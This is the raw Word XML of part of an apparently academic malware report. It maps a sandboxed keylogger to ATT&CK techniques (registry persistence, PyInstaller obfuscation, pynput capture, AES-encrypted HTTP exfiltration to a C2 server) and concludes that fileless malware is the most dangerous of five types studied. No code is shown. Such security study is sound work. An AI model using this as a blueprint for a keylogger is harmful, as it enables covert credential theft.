                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="685CA16B" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ATT&amp;CK ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44A97C08" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B61533" w:rsidRPr="00B61533" w14:paraId="7C52FB67" w14:textId="77777777" w:rsidTr="007044AE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="153C6B72" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49F2B6CD" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>User Execution (Malicious File)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F5BADC3" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>T1204</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B260321" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Keylogger likely executed via user click or startup task</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B61533" w:rsidRPr="00B61533" w14:paraId="21B68428" w14:textId="77777777" w:rsidTr="007044AE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16838659" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EC5B569" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Registry Run Keys / Startup Folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11CD5603" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>T1547.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D6974E7" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Startup key in registry ensures malware starts at boot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B61533" w:rsidRPr="00B61533" w14:paraId="1463FFBB" w14:textId="77777777" w:rsidTr="007044AE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71F8BBE2" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E4CC6A2" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="126D26AC" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>T1027</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="007144AB" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>PyInstaller packaging and silent execution reduce detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B61533" w:rsidRPr="00B61533" w14:paraId="07B6CABB" w14:textId="77777777" w:rsidTr="007044AE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B5677D5" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F4015FD" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Input Capture: Keylogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78984068" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>T1056.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03EBCA26" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Captures all keyboard input via pynput</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B61533" w:rsidRPr="00B61533" w14:paraId="793B585B" w14:textId="77777777" w:rsidTr="007044AE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A8C20E2" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CD63360" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Exfiltration Over Encrypted Channel (HTTP/AES)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="007DC956" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>T1041 / T1048</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74A1AB73" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>AES-encrypted keystrokes sent to Flask server via HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B61533" w:rsidRPr="00B61533" w14:paraId="4A12A692" w14:textId="77777777" w:rsidTr="007044AE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74B990EB" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DF97CF0" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Application Layer Protocol: HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="373AB684" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>T1071.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6278A9B0" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61533">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>C2 server listens and stores incoming keystroke data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="488CFC84" w14:textId="7E389EF8" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63C026BF" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B61533">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusion on Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9B6293" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="00B61533" w:rsidRDefault="00B61533" w:rsidP="00B61533">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B61533">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Both implementations align with ATT&amp;CK-mapped behavior observed in modern APT campaigns and commodity malware. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B61533">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fileless malware</w:t>
      </w:r>
      <w:r w:rsidRPr="00B61533">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> matches the stealth tactics of groups like FIN7 and APT32, while the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B61533">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>keylogger implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00B61533">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> reflects tools used in espionage, surveillance, and credential theft. This validation confirms the authenticity and realism of the techniques demonstrated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B177068" w14:textId="77777777" w:rsidR="00B61533" w:rsidRPr="008217DA" w:rsidRDefault="00B61533" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="454C8363" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="00115098" w:rsidRDefault="00612745" w:rsidP="00115098">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc194070989"/>
      <w:r w:rsidRPr="00115098">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="3151D1C7" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This report examined five advanced malware developments from an attacker’s perspective: fileless malware, phishing-based credential stealers, ransomware-as-a-service (RaaS), botnet malware, and keylogger-based malware. Each was evaluated through peer-reviewed academic research and two were replicated in sandbox environments to understand how they behave in real-world conditions. By combining theory with hands-on experimentation, the report presents a complete picture of how these threats work, why they succeed, and which of them poses the most severe adversarial risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77047B58" w14:textId="517620D4" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Among all five, </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fileless malware</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> stands out as the most dangerous. It operates entirely in system memory, leaves no files behind, and leverages trusted system tools like PowerShell to carry out its actions. This makes it incredibly difficult to detect using standard security tools. The literature showed consistent evidence of its stealth and growing use in advanced persistent threat (APT) campaigns. The experiment further confirmed this, where a fileless payload successfully opened a remote shell on the victim machine without triggering any alarms. These characteristics position fileless malware as a critical threat to modern </w:t>
      </w:r>
      <w:r w:rsidR="00115098" w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>systems. While</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> less technical, </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>phishing-based credential stealers</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> remain extremely effective because they exploit human trust rather than software flaws. With ready-made kits available and users still prone to deception, phishing continues to be a reliable and scalable attack method. It often serves as the first stage in more complex attacks, enabling keyloggers, ransomware, or remote access tools to be deployed </w:t>
      </w:r>
      <w:r w:rsidR="00B048E8" w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>afterward.</w:t>
      </w:r>
      <w:r w:rsidR="00B048E8" w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ransomware</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-as-a-Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>, though difficult to replicate ethically, represents the commerciali</w:t>
      </w:r>
      <w:r w:rsidR="00293279">
        <w:rPr>
